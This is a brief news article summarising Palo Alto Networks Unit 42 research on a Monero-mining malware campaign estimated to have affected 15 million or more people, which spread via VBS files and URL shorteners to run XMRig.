Cryptocurrency mining scam catches 15m people out
A large-scale cryptocurrency mining scam that’s been running undetected for over four months has affected more than 15 million people worldwide, according to research by Palo Alto Networks.
Palo Alto says the operation attempts to take over people’s computers to run software that generates or mines the Monero cryptocurrency using the open-source XMRig utility.
The cyber criminals then pocket the Monero cryptocurrency mined by the victim.
Palo Alto’s Unit 42 has observed a large-scale operation that has been active for over four months. This attempts to mine via the open-source XMRig utility.
Based on publicly available telemetry data via bitly, Unit 42 says it can estimate that the number of victims affected by this operation is roughly around 15 million people worldwide. This same telemetry provides insights into the most heavily targeted areas involving this campaign, which impacts southeast Asia, northern Africa, and South America the most.
However, Palo Alto says it’s “important to note that the actual number of victims is likely much higher because less than half of the samples we identified in this campaign leverage bitly”.
If it postulates that the bitly telemetry is typical for this operation, it can extrapolate to speculate that as many as 30 million people have been affected by this operation.
The attackers make heavy use of VBS files and use various online URL shortening services to install and run the XMRig payload. Additionally, the attackers mask the wallets used by leveraging XMRig proxy services on the hosts to which they are connected.
It says Monero mining campaigns are “certainly not a new development, as there have been various reported instances recently” but it is “less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time”.
Palo Alto points out that its customers are protected against this threat. These defences include all URLs used by the malware have been flagged as malicious; and all samples observed have been classified as malicious within WildFire (its cloud-based threat analysis service).
If all this hasn’t put you off, you can read an opinion piece on “What cryptocurrency trends can we expect in 2018?”.
